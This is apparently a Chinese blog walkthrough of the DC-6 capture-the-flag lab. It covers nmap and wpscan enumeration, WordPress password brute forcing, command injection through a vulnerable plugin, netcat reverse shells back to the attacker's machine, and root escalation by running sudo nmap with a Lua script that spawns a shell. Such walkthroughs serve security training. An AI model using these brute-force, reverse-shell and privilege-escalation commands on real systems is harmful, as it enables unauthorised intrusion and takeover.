多喝热水:http://hackergu.com
使用netdiscover
命令,发现主机IP为192.168.203.132
使用Nmap
,nmap -sV -A 192.168.203.132 --script=vuln
。
探测结果:
root@kali:~# nmap -sV -A 192.168.203.132 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 09:38 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.132
Host is up (0.00036s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /wp-login.php: Possible admin folder
| /readme.html: Wordpress version: 2
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
|_ /readme.html: Interesting, a readme.
|_http-server-header: Apache/2.4.25 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users:
| Username found: admin
| Username found: graham
| Username found: mark
| Username found: sarah
| Username found: jens
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
|_https-redirect: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:apache:http_server:2.4.25:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
| CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
| CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082
| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| CVE-2019-10081 5.0 https://vulners.com/cve/CVE-2019-10081
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196
| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
| CVE-2018-1333 5.0 https://vulners.com/cve/CVE-2018-1333
| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
| CVE-2017-7659 5.0 https://vulners.com/cve/CVE-2017-7659
| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
| CVE-2019-0197 4.9 https://vulners.com/cve/CVE-2019-0197
| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
| CVE-2018-11763 4.3 https://vulners.com/cve/CVE-2018-11763
|_ CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
MAC Address: 00:0C:29:FD:79:62 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.37 ms 192.168.203.132
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.90 seconds
这套靶机是要修改host文件的,具体可以参看我写的DC-2这篇文章。
因为做靶机做的习惯了,上来直接就看80端口,正好看到需要修改host文件,就直接修改了。
从扫描的结果来看,目标机器开放了22端口和80端口,80端口的web服务是一个Wordpress站点,并且还扫出了一些用户名。
| Username found: admin
| Username found: graham
| Username found: mark
| Username found: sarah
| Username found: jens
我们先去站点看一下:
看到这句话,我就大致确定可能得寻找插件的漏洞。
日wpscan的站点,当然要使用wpscan了。但是我利用这两条命令,都没能扫出可用漏洞。
wpscan --url http://wordy/ -e vt 扫描主题的漏洞
wpscan --url http://wordy/ -e vp 扫描插件的漏洞
那剩下的思路就应该是密码爆破了。
来到DC-6的网站看一下,发现一条提示:
我们需要利用此命令生成一个词典:
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
进行爆破:
wpscan --url http://wordy/ --passwords passwords.txt --usernames admin,graham,mark,sarah,jens
最终得到了一个账户和密码:
[i] Valid Combinations Found:
| Username: mark, Password: helpdesk01
利用得到的账户和密码登陆后台:
一番查看之后,发现此用户的权限并不高。
但是,发现了一个有趣的插件activity monitor
将此插件拿去百度搜了一下,发现此插件存在漏洞。
不清楚wpscan为什么扫不出来呢?
那接下来就利用此漏洞:
找到如下位置,然后写IP,点击lookup,抓包。
既然这样那就直接反弹shell吧。
nc 192.168.203.129 7777 -e /bin/bash
拿到shell了。
使用了以下两个命令,都没有特别大的发现。
sudo -l
find / -user root -perm -4000 -print 2>/dev/null
习惯性的去了/home
下,在mark
文件夹下看到了一个文件:
cat things-to-do.txt
Things to do:
- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
这里应该是创建了一个账户。
并且还在jens用户夹中发现了一个脚本:
www-data@dc-6:/home$ cd jens
cd jens
www-data@dc-6:/home/jens$ ls
ls
backups.sh
www-data@dc-6:/home/jens$ cat backups.sh
cat backups.sh
#!/bin/bash
tar -czf backups.tar.gz /var/www/html
不知道咋利用呀,先切换用户看看
重点来了!!!
此用户可以不需要密码得到jens的shell。
那我们在kali中再设置一个监听,再反弹:
#!/bin/bash
nc 192.168.203.129 8888 -e /bin/bash
在这里,由于反弹shell不太方便vi编写,我又用ssh登录了。
改写好脚本之后,我们使用jens
账户执行此脚本。
sudo -u jens /home/jens/backups.sh
现在我们拿到jens
账户的shell了。
再次sudo -l
发现我们可以无需root密码执行nmap
。
nmap可以执行它自己的脚本文件,后缀为.nse
#!/bin/bash
nc 192.168.203.129 9999 -e /bin/bash
这个地方卡了好久,本来想再反弹shell,但是这个这种反弹的编辑器太难受了。
参考了大神的思路,使用:
echo 'os.execute("/bin/sh")' > root.nse
jens@dc-6:~$ echo 'os.execute("/bin/sh")' > root.nse
echo 'os.execute("/bin/sh")' > root.nse
jens@dc-6:~$ cat root.nse
cat root.nse
os.execute("/bin/sh")
jens@dc-6:~$ sudo nmap --script=root.nse
sudo nmap --script=root.nse
Starting Nmap 7.40 ( https://nmap.org ) at 2020-02-15 13:43 AEST
# whoami
root
# cd /root
# ls
theflag.txt
# cat theflag.txt
Yb dP 888888 88 88 8888b. dP"Yb 88b 88 888888 d8b
Yb db dP 88__ 88 88 8I Yb dP Yb 88Yb88 88__ Y8P
YbdPYbdP 88"" 88 .o 88 .o 8I dY Yb dP 88 Y88 88"" `"'
YP YP 888888 88ood8 88ood8 8888Y" YbodP 88 Y8 888888 (8)
Congratulations!!!
Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
提权成功!